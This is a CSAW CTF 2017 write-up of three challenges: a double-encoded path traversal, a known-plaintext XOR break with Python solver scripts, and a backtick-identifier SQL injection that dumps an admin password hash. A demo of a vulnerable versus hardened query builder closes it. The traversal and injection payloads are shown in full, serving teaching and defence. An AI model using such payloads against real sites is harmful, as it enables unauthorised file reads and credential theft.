
CSAW CTF 2017

I didn't solve many, but I learned a lot from each one.
Two more challenges are coming once I finish writing them up.

orange v1

It's clearly a file inclusion, but trying to include files directly didn't work. Only after reading the writeup did I learn that
the . can be bypassed by encoding it with %25: ../ becomes %252e%252e/

Then walk up through as many directories as needed and flag.txt shows up.

flag:flag{thank_you_based_orange_for_this_ctf_challenge}

Another Xor

The challenge code:

import hashlib
import sys

def xor(s1,s2):
    return ''.join(chr(ord(a) ^ ord(b)) for a,b in zip(s1,s2))

def repeat(s, l):
    return (s*(int(l/len(s))+1))[:l]

key = sys.argv[1]
plaintext = sys.argv[2] + key
plaintext += hashlib.md5(plaintext).hexdigest()
cipher = xor(plaintext, repeat(key, len(plaintext)))
print cipher.encode('hex')

Data

0x274c10121a0100495b502d551c557f0b0833585d1b27030b5228040d3753490a1c025415051525455118001911534a0052560a14594f0b1e490a010c4514411e070014615a181b02521b580305170002074b0a1a4c414d1f1d171d00151b1d0f480e491e0249010c150050115c505850434203421354424c1150430b5e094d144957080d4444254643

At first I really had no idea how to approach it, because there is no way to determine the length of key or plaintext.
The writeup I read afterwards was also a bit confusing; I asked a senior student and worked through it myself for a long time before it clicked.
From the code we can see how the ciphertext is built and the overall logic:

[              ciphertext              ]
[key text][key text][key text][key text]
-------------------------------------------XOR
[message text][key text][hex characters]

The breakthrough is the MD5 value.
First, we know the plaintext starts with flag{; XORing that with the ciphertext gives the first five bytes of the key: A qua
We know the ciphertext is 137 bytes long, so message + key is 105 bytes, i.e. 137 minus the 32-character MD5.
Next is brute-forcing the key length.
My approach: try lengths from 5 up to 105, padding the key with *.
XOR the padded key with the ciphertext to get the plaintext, skipping every position where the key byte is * and filling the plaintext with ? there.
Then the crucial point is the MD5 value mentioned above: the last 32 bytes of the plaintext are the MD5 digest.
MD5 hex digests have a distinctive property: they consist only of 0123456789abcdef.
So we check whether the last 32 bytes of each candidate plaintext, ignoring the ? positions, fit that pattern.
The script:

# Reuses xor() and repeat() from the challenge code above; Python 2, like the challenge.
c = "0x274c10121a0100495b502d551c557f0b0833585d1b27030b5228040d3753490a1c025415051525455118001911534a0052560a14594f0b1e490a010c4514411e070014615a181b02521b580305170002074b0a1a4c414d1f1d171d00151b1d0f480e491e0249010c150050115c505850434203421354424c1150430b5e094d144957080d4444254643"
c = c[2:].decode('hex')       # hex2str: drop the 0x prefix and decode to raw bytes
#print len(c)                  # 137
def getKeyLen():
    f5 = xor("flag{", c[:5])  # the first five key bytes: "A qua"
    for i in range(95):
        m = ""
        key = f5 + '*' * i    # '*' marks the unknown key bytes
        rep = repeat(key, 137)
        for j in range(137):
            if rep[j] in f5:  # key byte known: recover the plaintext byte
                m += chr(ord(rep[j]) ^ ord(c[j]))
            else:             # key byte unknown: leave a placeholder
                m += '?'
        # The last 32 plaintext bytes must be an MD5 hex digest, so every
        # recovered byte there has to be a hex digit. Print only the lengths
        # that survive the whole check (for/else).
        for k in m[-32:].replace('?', ''):
            if k not in "0123456789abcdef":
                break
        else:
            print i + 5, m
getKeyLen()

Only one length passes the check: key length 67.
Once the key length is known, all of the plaintext can be derived.
The script:

def getPlaintext():
    # c is the decoded ciphertext from the previous script.
    # Known plaintext so far: "flag{" at the start, "A qua" at offset 38
    # (where the appended key begins), " zinc" at offset 67 (where the
    # repeated key stream wraps) and the MD5 digest's final "df2";
    # '?' marks unknown bytes.
    m = "flag{?????????????????????????????????A qua???????????????????????? zinc??????????????????????????????????????????????????????????????df2"
    # Known key stream: "A qua" at every 67-byte period, plus the final "A q".
    key = "A qua??????????????????????????????????????????????????????????????A qua??????????????????????????????????????????????????????????????A q"
    while '?' in m:
        m = list(m)
        key = list(key)
        for i in range(len(c)):
            if m[i] != '?' and key[i] == '?':   # known plaintext -> key byte
                key[i] = chr(ord(m[i]) ^ ord(c[i]))
            if m[i] == '?' and key[i] != '?':   # known key -> plaintext byte
                m[i] = chr(ord(key[i]) ^ ord(c[i]))
        m = ''.join(m)
        key = ''.join(key)

        print m
        # plaintext[38:105] is the 67-byte key itself; rebuild the full key
        # stream from it (67 * 2 + 3 = 137 bytes) and iterate again
        key = m[38:105] * 2 + 'A q'
getPlaintext()

flag:flag{sti11_us3_da_x0r_for_my_s3cratz}

LittleQuery

There is a login page; the password is hashed with sha1() on login.
In index.php there is a commented-out path: /api/db_explore.php

robots.txt
User-agent: *
Disallow: /api

Visiting /api/db_explore.php gives the prompt Must specify mode={schema|preview}
Trying ?mode=schema returns {"dbs":["littlequery"]}
Trying ?mode=preview returns Must provide db and table to preview data
Trying ?mode=preview&db=littlequery returns Must provide db and table to preview data
Trying ?mode=schema&db=littlequery returns {"tables":["user"]}
So it looks like the database structure can be dumped; the result:

"db":"littlequery",
"table":"user",
"columns": {
    "uid": "int(11)", 
    "username": "varchar(128)", 
    "password": "varchar(40)"
}

Continuing with ?mode=preview&db=littlequery&table=user returns Database 'littlequery' is not allowed to be previewed.
Changing littlequery to see what happens: ?mode=preview&db=littlequery2333&table=user

`littlequery2333`.`` doesn't exist.

After a bit of testing I tried

?mode=preview&db=littlequery`.`user`%20--%20--&table=  and the data came out:
[
    {
        "uid": "1", 
        "username": "admin", 
        "password": "5896e92d38ee883cc09ad6f88df4934f6b074cf8"
    }
]

Log in with it and you get the flag.

flag:flag{mayb3_1ts_t1m3_4_real_real_escape_string?}
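The injection works because the endpoint splices the raw db and table names into backtick-quoted identifiers while its block list only compares the raw string. The following is an added illustration, not the challenge's PHP (which is not on the page): Python on an in-memory SQLite database standing in for MySQL, with "main" playing the role of littlequery and a placeholder password hash, showing the vulnerable query builder beside one that resolves both names against the catalog before using them. The function names preview_vulnerable and preview_hardened are my own.

```python
import sqlite3

# Constructed stand-in for the challenge's backend: one in-memory SQLite
# database ("main" here plays the role of "littlequery") with the user table
# the schema mode revealed. The password value is a placeholder, not the CTF hash.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE user (uid INTEGER, username TEXT, password TEXT)")
conn.execute("INSERT INTO user VALUES (1, 'admin', 'sha1-placeholder')")

BLOCKED_DBS = {"main"}  # the API refused to preview the real database


def preview_vulnerable(db, table):
    """Behaves like the observed endpoint: the block list is checked against
    the raw parameter, then both names are pasted into backticks unescaped."""
    if db in BLOCKED_DBS:
        return "Database '%s' is not allowed to be previewed." % db
    sql = "SELECT * FROM `%s`.`%s`" % (db, table)
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.OperationalError:
        return "`%s`.`%s` doesn't exist." % (db, table)


def preview_hardened(db, table):
    """Identifiers cannot be bound as query parameters, so resolve them against
    the catalog first: only a name that exactly matches an existing database
    and table is ever interpolated, and the block list sees the canonical name."""
    known_dbs = {row[1] for row in conn.execute("PRAGMA database_list")}
    known_tables = {row[0] for row in
                    conn.execute("SELECT name FROM sqlite_master WHERE type='table'")}
    if db not in known_dbs or table not in known_tables:
        return "Unknown database or table."
    if db in BLOCKED_DBS:
        return "Database '%s' is not allowed to be previewed." % db
    return conn.execute("SELECT * FROM `%s`.`%s`" % (db, table)).fetchall()


if __name__ == "__main__":
    payload = "main`.`user` -- --"               # the page's payload, db name swapped
    print(preview_vulnerable("main", "user"))     # blocked, as on the page
    print(preview_vulnerable(payload, ""))        # block list bypassed, rows leak
    print(preview_hardened(payload, ""))          # rejected before reaching SQL
```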
